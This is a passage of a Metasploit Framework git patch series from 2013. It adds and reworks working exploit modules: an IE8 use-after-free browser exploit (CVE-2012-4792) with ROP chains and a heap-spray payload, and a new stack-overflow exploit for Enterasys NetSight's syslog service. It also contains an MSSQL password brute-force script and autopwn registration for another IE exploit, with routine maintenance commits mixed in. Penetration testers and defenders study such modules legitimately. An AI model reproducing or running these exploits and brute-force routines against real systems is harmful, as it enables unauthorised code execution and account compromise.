'http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx' ] + [ 'URL', 'http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx' ], + [ 'URL', 'http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/' ], + [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/12/29/microsoft-internet-explorer-0-day-marks-the-end-of-2012' ] ], 'Payload' => { - 'Space' => 980, - 'DisableNops' => true, - 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 + 'BadChars' => "\x00", + 'Space' => 1024, + 'DisableNops' => true }, 'DefaultOptions' => { @@ -58,10 +61,10 @@ class Metasploit3 < Msf::Exploit::Remote 'Targets' => [ [ 'Automatic', {} ], - [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30 - [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30 - [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30 - [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ] # 0x0c0c0b30 + [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ], + [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ], + [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ], + [ 'IE 8 on Windows 7', { 'Rop' => :jre } ] ], 'Privileged' => false, 'DisclosureDate' => "Dec 27 2012", @@ -107,28 +110,52 @@ class Metasploit3 < Msf::Exploit::Remote return nil end - def ie_heap_spray(my_target, p) - js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) - js_nops = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4), Rex::Arch.endian(target.arch)) + def ie8_smil(my_target, p) + + case my_target['Rop'] + when :msvcrt + case my_target.name + when 'IE 8 on Windows XP SP3' + align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET + xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET + when 'IE 8 on Windows Server 2003' + align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*")) + xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack("V*")) + end + else + align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*")) + xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack("V*")) + end + + padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4)) + js_payload = Rex::Text.to_unescape(p) - # Land the payload at 0x0c0c0b30 js = %Q| - var heap_obj = new heapLib.ie(0x20000); - var code = unescape("#{js_code}"); - var nops = unescape("#{js_nops}"); - while (nops.length < 0x80000) nops += nops; - var offset = nops.substring(0, #{my_target['Offset']}); - var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); - while (shellcode.length < 0x40000) shellcode += shellcode; - var block = shellcode.substring(0, (0x80000-6)/2); - heap_obj.gc(); - for (var i=1; i < 0x300; i++) { - heap_obj.alloc(block); + unicorn = unescape("#{padding}"); + for (i=0; i < 3; i++) { + unicorn += unescape("#{padding}"); + } + + unicorn += unescape("#{js_payload}"); + + animvalues = unescape("#{align_esp}"); + + for (i=0; i < 0xDC/4; i++) { + if (i == 0xDC/4-1) { + animvalues += unescape("#{xchg_esp}"); + } + else { + animvalues += unescape("#{align_esp}"); + } + } + + animvalues += unicorn; + + for(i = 0; i < 21; i++) { + animvalues += ";cyan"; } | - js = heaplib(js, {:noobfu => true}) - if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate @@ -137,85 +164,162 @@ class Metasploit3 < Msf::Exploit::Remote return js end + def junk(n=4) + return rand_text_alpha(n).unpack("V")[0].to_i + end + + def nop + return make_nops(4).unpack("V")[0].to_i + end + def get_payload(t, cli) code = payload.encoded # No rop. Just return the payload. return code if t['Rop'].nil? -=begin -Stack Pivoting to eax: -0:008> db eax -0c0c0b30 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ -0c0c0b40 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ -=end - # Both ROP chains generated by mona.py - See corelan.be case t['Rop'] when :msvcrt - print_status("Using msvcrt ROP") - if t.name =~ /Windows XP/ - stack_pivot = [0x77c15ed6].pack("V") * 54 # ret - stack_pivot << [0x77c2362c].pack("V") # pop ebx, #ret - stack_pivot << [0x77c15ed5].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c - rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'}) - else - stack_pivot = [0x77bcba5f].pack("V") * 54 # ret - stack_pivot << [0x77bb4158].pack("V") # pop ebx, #ret - stack_pivot << [0x77bcba5e].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c - rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'2003'}) + case t.name + when 'IE 8 on Windows XP SP3' + rop_gadgets = + [ + 0x77c1e844, # POP EBP # RETN [msvcrt.dll] + 0x77c1e844, # skip 4 bytes [msvcrt.dll] + 0x77c4fa1c, # POP EBX # RETN [msvcrt.dll] + 0xffffffff, + 0x77c127e5, # INC EBX # RETN [msvcrt.dll] + 0x77c127e5, # INC EBX # RETN [msvcrt.dll] + 0x77c4e0da, # POP EAX # RETN [msvcrt.dll] + 0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx) + 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] + 0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll] + 0x77c34fcd, # POP EAX # RETN [msvcrt.dll] + 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx) + 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] + 0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll] + 0x77c3048a, # POP EDI # RETN [msvcrt.dll] + 0x77c47a42, # RETN (ROP NOP) [msvcrt.dll] + 0x77c46efb, # POP ESI # RETN [msvcrt.dll] + 0x77c2aacc, # JMP [EAX] [msvcrt.dll] + 0x77c3b860, # POP EAX # RETN [msvcrt.dll] + 0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll] + 0x77c12df9, # PUSHAD # RETN [msvcrt.dll] + 0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll] + ].pack("V*") + when 'IE 8 on Windows Server 2003' + rop_gadgets = + [ + 0x77bb2563, # POP EAX # RETN + 0x77ba1114, # <- *&VirtualProtect() + 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN + junk, + 0x77bb0c86, # XCHG EAX,ESI # RETN + 0x77bc9801, # POP EBP # RETN + 0x77be2265, # ptr to 'push esp # ret' + 0x77bb2563, # POP EAX # RETN + 0x03C0990F, + 0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx) + 0x77bb48d3, # POP EBX, RET + 0x77bf21e0, # .data + 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN + 0x77bbfc02, # POP ECX # RETN + 0x77bef001, # W pointer (lpOldProtect) (-> ecx) + 0x77bd8c04, # POP EDI # RETN + 0x77bd8c05, # ROP NOP (-> edi) + 0x77bb2563, # POP EAX # RETN + 0x03c0984f, + 0x77bdd441, # SUB EAX, 03c0940f + 0x77bb8285, # XCHG EAX,EDX # RETN + 0x77bb2563, # POP EAX # RETN + nop, + 0x77be6591 # PUSHAD # ADD AL,0EF # RETN + ].pack("V*") end else - print_status("Using JRE ROP") - stack_pivot = [0x7c348b06].pack("V") * 54 # ret - stack_pivot << [0x7c341748].pack("V") # pop ebx, #ret - stack_pivot << [0x7c348b05].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c - rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot}) + rop_gadgets = + [ + 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN + 0xfffffdff, # Value to negate, will become 0x00000201 (dwSize) + 0x7c347f98, # RETN (ROP NOP) [msvcr71.dll] + 0x7c3415a2, # JMP [EAX] [msvcr71.dll] + 0xffffffff, + 0x7c376402, # skip 4 bytes [msvcr71.dll] + 0x7c351e05, # NEG EAX # RETN [msvcr71.dll] + 0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll] + 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll] + 0x7c344f87, # POP EDX # RETN [msvcr71.dll] + 0xffffffc0, # Value to negate, will become 0x00000040 + 0x7c351eb1, # NEG EDX # RETN [msvcr71.dll] + 0x7c34d201, # POP ECX # RETN [msvcr71.dll] + 0x7c38b001, # &Writable location [msvcr71.dll] + 0x7c347f97, # POP EAX # RETN [msvcr71.dll] + 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] + 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] + 0x7c345c30 # ptr to 'push esp # ret ' [msvcr71.dll] + # rop chain generated with mona.py + ].pack("V*") end + rop_payload = rop_gadgets + case t['Rop'] + when :msvcrt + rop_payload << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 + else + rop_payload << "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000 + end + rop_payload << code + rop_payload << rand_text_alpha(12000) unless t['Rop'] == :msvcrt + return rop_payload end def load_exploit_html(my_target, cli) p = get_payload(my_target, cli) - js = ie_heap_spray(my_target, p) + js = ie8_smil(my_target, p) html = %Q| - + - -
+ +
+ - - | @@ -277,5 +381,4 @@ eip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 mshtml!CMarkup::OnLoadStatusDone+0x504: 637848c3 ff90dc000000 call dword ptr [eax+0DCh] ds:0023:0c0c0ce8=???????? - -=end \ No newline at end of file +=end From 45808a3a445508b63f87a04c768bf544ea4ad315 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 3 Jan 2013 19:17:45 +0100 Subject: [PATCH 140/154] Added module for ZDI-11-350 --- .../misc/enterasys_netsight_syslog_bof.rb | 159 ++++++++++++++++++ 1 file changed, 159 insertions(+) create mode 100644 modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb diff --git a/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb b/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb new file mode 100644 index 0000000000..31eee6a611 --- /dev/null +++ b/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb @@ -0,0 +1,159 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Udp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Enterasys NetSight nssyslogd.exe Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in Enterasys NetSight. The + vulnerability exists in the Syslog service (nssylogd.exe) when parsing a specially + crafted PRIO from a syslog message. The module has been tested successfully on + Enterasys NetSight 4.0.1.34 over Windows XP SP3 and Windows 2003 SP2. + }, + 'Author' => + [ + 'Jeremy Brown', # Vulnerability discovery + 'rgod ', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + ['CVE', '2011-5227'], + ['OSVDB', '77971'], + ['BID', '51124'], + ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-350/'], + ['URL', 'https://cp-enterasys.kb.net/al/12/3/article.aspx?aid=14206&bt=4'] + ], + 'Payload' => + { + 'BadChars' => "\x00", + 'Space' => 3000, + 'DisableNops' => true, + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 + }, + 'Platform' => 'win', + 'Targets' => + [ + ['Enterasys NetSight 4.0.1.34 / Windows XP SP3', + { + 'Offset' => 43, + 'Ret' => 0x77c4e444 # ADD ESP,30 # POP EDX # RETN # from msvcrt + } + ], + ['Enterasys NetSight 4.0.1.34 / Windows 2003 SP2', + { + 'Offset' => 43, + 'Ret' => 0x77bdf444 # ADD ESP,30 # POP EDX # RETN # from msvcrt + } + ] + ], + 'Privileged' => true, + 'DisclosureDate' => 'Dec 19 2011', + 'DefaultTarget' => 1 + )) + + register_options([ Opt::RPORT(514) ], self.class) + end + + def junk(n=4) + return rand_text_alpha(n).unpack("V")[0].to_i + end + + def nop + return make_nops(4).unpack("V")[0].to_i + end + + def get_stackpivot + stack_pivot = '' + case target.name + when /Windows XP SP3/ + stack_pivot << [0x77c4e448].pack("V") #ret + stack_pivot << [0x77c4e448].pack("V") #ret + stack_pivot << [0x77c4e448].pack("V") #ret + stack_pivot << [0x77c4e448].pack("V") #ret + stack_pivot << [0x77c4e444].pack("V") # ADD ESP,30 # POP EDX # RETN + when /Windows 2003 SP2/ + stack_pivot << [0x77bdf448].pack("V") #ret + stack_pivot << [0x77bdf448].pack("V") #ret + stack_pivot << [0x77bdf448].pack("V") #ret + stack_pivot << [0x77bdf448].pack("V") #ret + stack_pivot << [0x77bdf444].pack("V") # ADD ESP,30 # POP EDX # RETN + end + return stack_pivot + end + + def get_payload + my_payload = '' + + case target.name + when /Windows XP SP3/ + jmp_esp = [0x77c35459].pack("V") + my_payload << jmp_esp + when /Windows 2003 SP2/ + rop_gadgets = + [ + 0x77bb2563, # POP EAX # RETN + 0x77ba1114, # <- *&VirtualProtect() + 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN + junk, + 0x77bb0c86, # XCHG EAX,ESI # RETN + 0x77bc9801, # POP EBP # RETN + 0x77be2265, # ptr to 'push esp # ret' + 0x77bb2563, # POP EAX # RETN + #0x03C0990F, + 0x03c09f0f, + 0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0xb00 -> ebx) + 0x77bb48d3, # POP EBX, RET + 0x77bf21e0, # .data + 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN + 0x77bbfc02, # POP ECX # RETN + 0x77bef001, # W pointer (lpOldProtect) (-> ecx) + 0x77bd8c04, # POP EDI # RETN + 0x77bd8c05, # ROP NOP (-> edi) + 0x77bb2563, # POP EAX # RETN + 0x03c0984f, + 0x77bdd441, # SUB EAX, 03c0940f + 0x77bb8285, # XCHG EAX,EDX # RETN + 0x77bb2563, # POP EAX # RETN + nop, + 0x77be6591, # PUSHAD # ADD AL,0EF # RETN + ].pack("V*") + my_payload << rop_gadgets + end + + my_payload << payload.encoded + return my_payload + end + + def exploit + connect_udp + + prio = "<" + prio << rand_text_alpha(19) + prio << get_stackpivot + prio << rand_text_alpha(4) + prio << [target.ret].pack("V") + prio << ">" + + message = prio + message << rand_text_alpha(11) + message << get_payload + + print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...") + udp_sock.put(message) + + disconnect_udp + end + +end From 9cea2d9af9f8ccffb6d782a00c2e9d306d85aefe Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 3 Jan 2013 19:39:18 +0100 Subject: [PATCH 141/154] reference updated --- modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb b/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb index 31eee6a611..3aeb1121a0 100644 --- a/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb +++ b/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote ['OSVDB', '77971'], ['BID', '51124'], ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-350/'], - ['URL', 'https://cp-enterasys.kb.net/al/12/3/article.aspx?aid=14206&bt=4'] + ['URL', 'https://cp-enterasys.kb.net/article.aspx?article=14206&p=1'] ], 'Payload' => { From 328b740c447ebde0cbe60988242ece2dc16a7517 Mon Sep 17 00:00:00 2001 From: CG Date: Thu, 3 Jan 2013 14:11:12 -0500 Subject: [PATCH 142/154] mssql brute resource script --- scripts/resource/mssql_brute.rc | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 scripts/resource/mssql_brute.rc diff --git a/scripts/resource/mssql_brute.rc b/scripts/resource/mssql_brute.rc new file mode 100644 index 0000000000..305b6a9bc6 --- /dev/null +++ b/scripts/resource/mssql_brute.rc @@ -0,0 +1,33 @@ + + +hosts = [] + +begin + framework.db.services.each do |service| + if ( service.name =~ /mssql/i and service.state == 'open' and service.proto == 'tcp') + hosts << {'ip' => service.host.address, 'port' => service.port} + end + end +rescue ActiveRecord::ConnectionNotEstablished +puts "DB not connected..." +# Uncomment if you want auto-reconnect and retry (on really large scans the db connector can time out) +# self.run_single('db_connect ') +# puts "trying again..." +# retry +end + +self.run_single("use auxiliary/scanner/mssql/mssql_login") +self.run_single('set PASS_FILE /opt/framework/data/wordlists/mssql.txt') +#self.run_single('set STOP_ON_SUCCESS TRUE') +hosts.each do |rhost| + + self.run_single("set RHOSTS #{rhost['ip']}") + self.run_single("set RPORT #{rhost['port']}") + self.run_single('set BRUTEFORCE_SPEED 5') + self.run_single('set BLANK_PASSWORDS false') + self.run_single('set USER_AS_PASS false') + self.run_single('run') + sleep 1 +end + + From 233378f0fb09bceada06a76d267bc53aecd9a018 Mon Sep 17 00:00:00 2001 From: James Lee Date: Thu, 3 Jan 2013 14:05:45 -0600 Subject: [PATCH 143/154] Remove stupid debugging load() --- modules/post/windows/escalate/ms10_092_schelevator.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/post/windows/escalate/ms10_092_schelevator.rb b/modules/post/windows/escalate/ms10_092_schelevator.rb index 1a0cc5397b..f486f916b3 100644 --- a/modules/post/windows/escalate/ms10_092_schelevator.rb +++ b/modules/post/windows/escalate/ms10_092_schelevator.rb @@ -13,8 +13,7 @@ require 'zlib' class Metasploit3 < Msf::Post - #require 'msf/core/module/deprecated' - load 'lib/msf/core/module/deprecated.rb' + require 'msf/core/module/deprecated' include Msf::Module::Deprecated deprecated Date.new(2013,6,1), "exploit/windows/local/ms10_092_schelevator" From 011ff18c987a663a1b54cc09f3a50a1b954116b4 Mon Sep 17 00:00:00 2001 From: James Lee Date: Thu, 3 Jan 2013 14:06:32 -0600 Subject: [PATCH 144/154] Remove $ --- modules/post/windows/escalate/ms10_092_schelevator.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/post/windows/escalate/ms10_092_schelevator.rb b/modules/post/windows/escalate/ms10_092_schelevator.rb index f486f916b3..99b95d9727 100644 --- a/modules/post/windows/escalate/ms10_092_schelevator.rb +++ b/modules/post/windows/escalate/ms10_092_schelevator.rb @@ -34,7 +34,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'References' => From 6fd35482cc1e73b4f23b0f67121736e11c14710e Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 3 Jan 2013 14:45:00 -0600 Subject: [PATCH 145/154] This exploit should be in browser auto pwn --- modules/exploits/windows/browser/ie_cbutton_uaf.rb | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/modules/exploits/windows/browser/ie_cbutton_uaf.rb b/modules/exploits/windows/browser/ie_cbutton_uaf.rb index 1b475a0e5b..8b36b5e4a2 100644 --- a/modules/exploits/windows/browser/ie_cbutton_uaf.rb +++ b/modules/exploits/windows/browser/ie_cbutton_uaf.rb @@ -12,6 +12,15 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb + include Msf::Exploit::Remote::BrowserAutopwn + autopwn_info({ + :ua_name => HttpClients::IE, + :ua_minver => "8.0", + :ua_maxver => "8.0", + :javascript => true, + :os_name => OperatingSystems::WINDOWS, + :rank => GoodRanking + }) def initialize(info={}) super(update_info(info, From 39e81fb07f7512befd39d8e702a7a86a580ff858 Mon Sep 17 00:00:00 2001 From: Tonimir Kisasondi Date: Thu, 3 Jan 2013 21:52:10 +0100 Subject: [PATCH 146/154] Update modules/auxiliary/scanner/http/wordpress_login_enum.rb Simple fix for msfconsole start error. --- modules/auxiliary/scanner/http/wordpress_login_enum.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/wordpress_login_enum.rb b/modules/auxiliary/scanner/http/wordpress_login_enum.rb index 08955c872f..85fd043d2b 100644 --- a/modules/auxiliary/scanner/http/wordpress_login_enum.rb +++ b/modules/auxiliary/scanner/http/wordpress_login_enum.rb @@ -138,8 +138,7 @@ class Metasploit3 < Msf::Auxiliary :sname => (ssl ? 'https' : 'http'), :user => user, :port => rport, - :proof => "WEBAPP=\"Wordpress\", VHOST=#{vhost}", - + :proof => "WEBAPP=\"Wordpress\", VHOST=#{vhost}" ) @users_found[user] = :reported From da7007418478bc60afd7f5e3a8acb712d22be929 Mon Sep 17 00:00:00 2001 From: Brandon Turner Date: Thu, 3 Jan 2013 16:34:13 -0600 Subject: [PATCH 147/154] Load environment before starting msfgui msfgui checks for the msgpack gem before spinning up, however if this gem is installed in lib/gemcache it will not be found. This commit loads the normal msf environment, including lib/gemcache if applicable, before starting msfgui. --- msfgui | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/msfgui b/msfgui index 05b6d5e510..127ef8f7f1 100755 --- a/msfgui +++ b/msfgui @@ -8,17 +8,21 @@ # $Revision$ # +msfbase = __FILE__ +while File.symlink?(msfbase) + msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase)) +end + +$:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib'))) +require 'fastlib' +require 'msfenv' + begin require 'msgpack' rescue LoadError raise LoadError, "Missing msgpack gem, try 'gem install msgpack' to use MSFGui" end -msfbase = __FILE__ -while File.symlink?(msfbase) - msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase)) -end - if RUBY_PLATFORM =~ /mswin|mingw/i exec "javaw -jar #{File.dirname(msfbase)}/data/gui/msfgui.jar" else From a0b4045b4bdd8cf08d5c07f621b7c7fb4a38ed34 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 4 Jan 2013 00:25:34 +0100 Subject: [PATCH 148/154] trying to fix the variable offset length --- modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb b/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb index 3aeb1121a0..7cf54720aa 100644 --- a/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb +++ b/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb @@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote prio << ">" message = prio - message << rand_text_alpha(11) + message << rand_text_alpha(9 + (15 - Rex::Socket.source_address(datastore['RHOST']).length)) # Allow to handle the variable offset due to the source ip length message << get_payload print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...") From 25aaf7a676a28feaad15abf95e18f108d7115a3c Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Fri, 4 Jan 2013 00:41:41 +0100 Subject: [PATCH 149/154] msftidy: Remove $Id$ --- modules/encoders/cmd/generic_sh.rb | 4 ---- modules/encoders/cmd/ifs.rb | 4 ---- modules/encoders/cmd/printf_php_mq.rb | 4 ---- modules/encoders/encoder_test.rb.ut.rb | 4 ---- modules/encoders/generic/none.rb | 4 ---- modules/encoders/generic/none.rb.ut.rb | 4 ---- modules/encoders/mipsbe/longxor.rb | 4 ---- modules/encoders/mipsle/longxor.rb | 4 ---- modules/encoders/php/base64.rb | 4 ---- modules/encoders/ppc/longxor.rb | 4 ---- modules/encoders/ppc/longxor_tag.rb | 4 ---- modules/encoders/sparc/longxor_tag.rb | 4 ---- modules/encoders/x64/xor.rb | 4 ---- modules/encoders/x86/alpha_mixed.rb | 4 ---- modules/encoders/x86/alpha_upper.rb | 4 ---- modules/encoders/x86/avoid_underscore_tolower.rb | 4 ---- modules/encoders/x86/avoid_utf8_tolower.rb | 4 ---- modules/encoders/x86/call4_dword_xor.rb | 4 ---- modules/encoders/x86/call4_dword_xor.rb.ut.rb | 4 ---- modules/encoders/x86/context_cpuid.rb | 4 ---- modules/encoders/x86/context_stat.rb | 4 ---- modules/encoders/x86/context_time.rb | 4 ---- modules/encoders/x86/countdown.rb | 4 ---- modules/encoders/x86/countdown.rb.ut.rb | 4 ---- modules/encoders/x86/fnstenv_mov.rb | 4 ---- modules/encoders/x86/fnstenv_mov.rb.ut.rb | 4 ---- modules/encoders/x86/jmp_call_additive.rb | 4 ---- modules/encoders/x86/nonalpha.rb | 4 ---- modules/encoders/x86/nonupper.rb | 4 ---- modules/encoders/x86/shikata_ga_nai.rb | 4 ---- modules/encoders/x86/single_static_bit.rb | 4 ---- modules/encoders/x86/unicode_mixed.rb | 4 ---- modules/encoders/x86/unicode_upper.rb | 4 ---- modules/exploits/aix/rpc_cmsd_opcode21.rb | 4 ---- modules/exploits/aix/rpc_ttdbserverd_realpath.rb | 4 ---- modules/exploits/apple_ios/browser/safari_libtiff.rb | 4 ---- modules/exploits/apple_ios/email/mobilemail_libtiff.rb | 4 ---- modules/exploits/bsdi/softcart/mercantec_softcart.rb | 4 ---- modules/exploits/dialup/multi/login/manyargs.rb | 4 ---- modules/exploits/freebsd/ftp/proftp_telnet_iac.rb | 4 ---- modules/exploits/freebsd/samba/trans2open.rb | 4 ---- modules/exploits/freebsd/tacacs/xtacacsd_report.rb | 4 ---- modules/exploits/hpux/lpd/cleanup_exec.rb | 4 ---- modules/exploits/irix/lpd/tagprinter_exec.rb | 4 ---- modules/exploits/linux/ftp/proftp_sreplace.rb | 4 ---- modules/exploits/linux/ftp/proftp_telnet_iac.rb | 4 ---- modules/exploits/linux/games/ut2004_secure.rb | 4 ---- modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb | 4 ---- modules/exploits/linux/http/ddwrt_cgibin_exec.rb | 4 ---- modules/exploits/linux/http/gpsd_format_string.rb | 4 ---- modules/exploits/linux/http/linksys_apply_cgi.rb | 4 ---- modules/exploits/linux/http/peercast_url.rb | 4 ---- modules/exploits/linux/http/piranha_passwd_exec.rb | 4 ---- modules/exploits/linux/ids/snortbopre.rb | 4 ---- modules/exploits/linux/imap/imap_uw_lsub.rb | 4 ---- modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb | 4 ---- modules/exploits/linux/misc/accellion_fta_mpipe2.rb | 4 ---- modules/exploits/linux/misc/drb_remote_codeexec.rb | 4 ---- modules/exploits/linux/misc/gld_postfix.rb | 4 ---- modules/exploits/linux/misc/hplip_hpssd_exec.rb | 4 ---- modules/exploits/linux/misc/ib_inet_connect.rb | 4 ---- modules/exploits/linux/misc/ib_jrd8_create_database.rb | 4 ---- modules/exploits/linux/misc/ib_open_marker_file.rb | 4 ---- modules/exploits/linux/misc/ib_pwd_db_aliased.rb | 4 ---- modules/exploits/linux/misc/lprng_format_string.rb | 4 ---- modules/exploits/linux/misc/netsupport_manager_agent.rb | 4 ---- modules/exploits/linux/mysql/mysql_yassl_getname.rb | 4 ---- modules/exploits/linux/mysql/mysql_yassl_hello.rb | 4 ---- modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb | 4 ---- modules/exploits/linux/pptp/poptop_negative_read.rb | 4 ---- modules/exploits/linux/proxy/squid_ntlm_authenticate.rb | 4 ---- modules/exploits/linux/samba/chain_reply.rb | 4 ---- modules/exploits/linux/samba/lsa_transnames_heap.rb | 4 ---- modules/exploits/linux/samba/trans2open.rb | 4 ---- modules/exploits/multi/browser/firefox_escape_retval.rb | 4 ---- modules/exploits/multi/browser/firefox_queryinterface.rb | 4 ---- modules/exploits/multi/browser/itms_overflow.rb | 4 ---- modules/exploits/multi/browser/java_calendar_deserialize.rb | 4 ---- modules/exploits/multi/browser/java_getsoundbank_bof.rb | 4 ---- modules/exploits/multi/browser/java_rmi_connection_impl.rb | 4 ---- modules/exploits/multi/browser/java_setdifficm_bof.rb | 4 ---- modules/exploits/multi/browser/java_signed_applet.rb | 4 ---- modules/exploits/multi/browser/java_trusted_chain.rb | 4 ---- modules/exploits/multi/browser/mozilla_compareto.rb | 4 ---- modules/exploits/multi/browser/mozilla_navigatorjava.rb | 4 ---- modules/exploits/multi/browser/opera_configoverwrite.rb | 4 ---- modules/exploits/multi/browser/opera_historysearch.rb | 4 ---- modules/exploits/multi/browser/qtjava_pointer.rb | 4 ---- modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb | 4 ---- modules/exploits/multi/fileformat/maple_maplet.rb | 4 ---- modules/exploits/multi/fileformat/peazip_command_injection.rb | 4 ---- modules/exploits/multi/ftp/wuftpd_site_exec_format.rb | 4 ---- modules/exploits/multi/handler.rb | 4 ---- modules/exploits/multi/http/freenas_exec_raw.rb | 4 ---- modules/exploits/multi/http/glassfish_deployer.rb | 4 ---- modules/exploits/multi/http/jboss_bshdeployer.rb | 4 